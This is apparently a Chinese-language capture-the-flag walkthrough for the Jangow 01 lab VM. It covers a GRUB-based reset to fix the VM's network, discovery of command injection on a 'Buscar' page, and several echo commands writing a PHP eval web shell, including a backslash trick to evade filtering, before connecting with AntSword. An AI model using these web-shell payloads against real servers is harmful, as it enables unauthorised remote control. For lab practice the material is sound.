jangow-01-1.0.1
首先kali终端运行以下命令查看靶机ip
这里我们发现并没有查到靶机的ip,这时我们重启靶机
打开靶机,按下shift,出现下图界面
再次按下e键,进入到如下界面
将ro替换为rw signie init=/bin/bash
替换完毕后,按下Ctrl键+X键,进入如下页面
输入vi /etc/network/interfaces编辑网卡信息,改完后按shift+?键才能输出保存,修改完成后重启靶机即可
然后来到kali终端,继续运行以下命令查看靶机ip
这样我们就可以得到靶机的ip了
浏览器访问此ip
点击site文件夹,网页跳转
把所有的功能点都点一遍,当我们点击Buscar时,出现以下页面,发现有传参的地方
输入命令看看能不能执行,发现成功解析
那么我们就可以确定该处存在命令执行漏洞
尝试将一句话木马写入文件中,具体代码如下
echo "<?php @eval($_POST[a]);?>" > 1.php
再次写入一个1.txt文件,测试是否成功写入
echo "<?php @eval($_POST[a]);?>" > 1.txt
接下来访问这个文件,发现传参方式被过滤
可以在被过滤的地方加一个反斜杠,再次写入
echo "<?php @eval(\$_POST[a]);?>" > 1.txt
再次访问1.txt,测试可以成功写入
修改后缀名为1.php,重新写入
echo "<?php @eval(\$_POST[a]);?>" > 1.php
尝试访问1.php,蚁剑连接
连接成功,获取getshell